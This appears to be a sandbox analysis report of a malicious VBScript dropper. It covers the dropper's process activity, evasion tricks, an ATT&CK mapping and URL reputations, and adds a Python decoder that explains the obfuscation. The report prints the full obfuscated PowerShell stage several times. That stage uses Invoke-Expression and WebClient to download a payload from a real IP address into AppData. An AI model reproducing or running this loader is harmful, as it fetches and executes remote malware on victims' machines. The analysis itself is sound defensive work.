      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2053986258.0000021294821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045877123.0000021294621000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdblz[ source: powershell.exe, 00000002.00000002.3350719704.000001BF33118000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Prerem", "Unsupported parameter type 00000000")
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . 
rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . 
rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=Jump to behavior
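The command line above carries both the sample's string decoder and its encoded literals, so the second stage can be read without running it. The Python below is an added example written for this page (not part of the Joe Sandbox report, and not the sample's code): it re-implements the `Opbrugets52` function and applies it to literals copied from the command line. In each literal every fifth character starting at offset 4 is real and the rest is filler; the final character is padding that the loop bound excludes only when `$host.PrivateData` is non-null, which makes the check a cheap emulator probe. The dictionary keys are the sample's own variable names, except `stmt_drop_path`, a label chosen here for a statement literal the sample passes straight to `ggepuncherne`. The decoded values in the notes below are this decoder's output, not facts stated elsewhere in the report.

```python
"""Port of the string decoder (Opbrugets52) used by the PowerShell stage above.

Added example for this page; not part of the Joe Sandbox report and not the
sample's own code. BLOBS holds obfuscated literals copied from the process
command line in the report, keyed by the PowerShell variable the sample
assigns them to ("stmt_drop_path" is a label chosen here).
"""

BLOBS = {
    "Ugenummer": " An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ",
    "billardkugle": "Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ",
    "onymize": "Plat>Awap ",
    "Topographometric": "BangIMa mE skuxKalk ",
    "stmt_drop_path": "bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ",
    "Hexactinellid40": "Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ",
}


def opbrugets52(blob: str, navicert: int = 1) -> str:
    """Port of the sample's Opbrugets52.

    PowerShell original, with the sample's variable names:
        $Postnarisnhaust = $Hellenist + $Craftsmaster.Length - $Navicert
        for ($Postnaris = 4; $Postnaris -lt $Postnarisnhaust; $Postnaris += 5) {
            $Informativ += $Craftsmaster[$Postnaris]
        }
    $Hellenist is never assigned, so it contributes 0. $Navicert is incremented
    once, and only if $host.PrivateData is non-null (true in a normal console
    host), so the loop stops one character short of the padding at the end of
    each literal. In a host where PrivateData is null, navicert stays 0 and
    every decoded string picks up that padding character.
    """
    return blob[4:len(blob) - navicert:5]


def decode_all(navicert: int = 1) -> dict[str, str]:
    """Decode every literal in BLOBS for a given outcome of the host check."""
    return {name: opbrugets52(blob, navicert) for name, blob in BLOBS.items()}


def download_urls(decoded: dict[str, str]) -> list[str]:
    """Mirror the sample's split of the URL literal on $onymize; the command
    line then takes element 0 of the result ($Ugenummer=$Salamandrine[0])."""
    return decoded["Ugenummer"].split(decoded["onymize"])


if __name__ == "__main__":
    decoded = decode_all()
    for name, value in decoded.items():
        print(f"{name:18s} -> {value!r}")
    print("first download URL:", download_urls(decoded)[0])
    # Host check failed (PrivateData null): padding leaks into every string.
    print("onymize with navicert=0:", repr(decode_all(navicert=0)["onymize"]))  # '> '
```

With the host check passing, `$Ugenummer` decodes to `http://91.109.20.161/Hestebremsen.chm`, `$billardkugle` to `USEr-aGent` (a header name; case does not matter to WebClient), `$onymize` to `>` and `$Topographometric` to `IEx`, so `ggepuncherne` is `& IEx (...)`, Invoke-Expression over each decoded statement. The two statement literals decode to `$global:Indkopiering=$env:appdata+$Garwin`, i.e. the drop path `%APPDATA%\Dorgens.Uns`, and `$GloBAl:GruiNe=NeW-ObjECt sysTem.Net.webcLIeNT`; the truncated final statement is `$GruiNe.Headers[...]=` with the User-Agent header name as the index. With `navicert=0` every literal comes out one padding character too long (`>` becomes `> `, the URL gains a trailing space), which is why the stage only works under a host whose `PrivateData` is set. One caveat when copying literals from this page: the HTML rendering collapses runs of spaces, so literals that contained a double space (the `$Postnarisnertion254` User-Agent literal, which reads as a Firefox 121 User-Agent, and the `$global:Salamandrine=...` statement) decode correctly only up to the lost space; take those from the original .vbs or the raw sandbox data.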
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848DB7969 push ebx; retf 2_2_00007FF848DB796A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848DB00BD pushad ; iretd 2_2_00007FF848DB00C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848E879C9 push ebx; ret 2_2_00007FF848E879CA
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (80 occurrences)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4682
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5219
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432 Thread sleep time: -5534023222112862s >= -30000s
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: powershell.exe, 00000002.00000002.3350719704.000001BF33154000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match, File source: amsi64_2448.amsi.csv, type: OTHER
      Source: Yara match, File source: Process Memory Space: powershell.exe PID: 2448, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      ATT&CK matrix by tactic:
      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
      Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
      Execution: 2 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 2 PowerShell; Cron; Launchd; Scheduled Task
      Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 2 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
      Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
      Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
      Command and Control: 1 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
      Source | Detection | Scanner
      transferencia.vbs | 3% | ReversingLabs
      transferencia.vbs | 15% | Virustotal
      No Antivirus matches
      Source | Detection | Scanner | Label
      http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
      https://go.micro | 0% | URL Reputation | safe
      https://contoso.com/ | 0% | URL Reputation | safe
      https://nuget.org/nuget.exe | 0% | URL Reputation | safe
      https://contoso.com/License | 0% | URL Reputation | safe
      https://contoso.com/Icon | 0% | URL Reputation | safe
      https://aka.ms/pscore68 | 0% | URL Reputation | safe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
      http://91.109.20.161/Hestebremsen.chm | 1% | Virustotal
      http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal
      http://91.109.20.161 | 4% | Virustotal
      https://github.com/Pester/Pester | 1% | Virustotal
      No contacted domains info
      Name | Malicious | Antivirus Detection | Reputation
      http://91.109.20.161/Hestebremsen.chm | false | | unknown
      Name | Source | Malicious | Antivirus Detection | Reputation
      http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
      https://go.micro | powershell.exe, 00000002.00000002.3327025092.000001BF1B878000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://contoso.com/ | powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://contoso.com/License | powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://contoso.com/Icon | powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://91.109.20.161 | powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C628000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
      http://91.109.20.161( | powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6EB000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
      http://91.109.20.161/Hestebremsen.chmP | powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
          IP | Domain | Country | ASN | ASN Name | Malicious
          91.109.20.161 | unknown | Germany | 28753 | LEASEWEB-DE-FRA-10DE | false
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1524803
          Start date and time:2024-10-03 09:27:07 +02:00
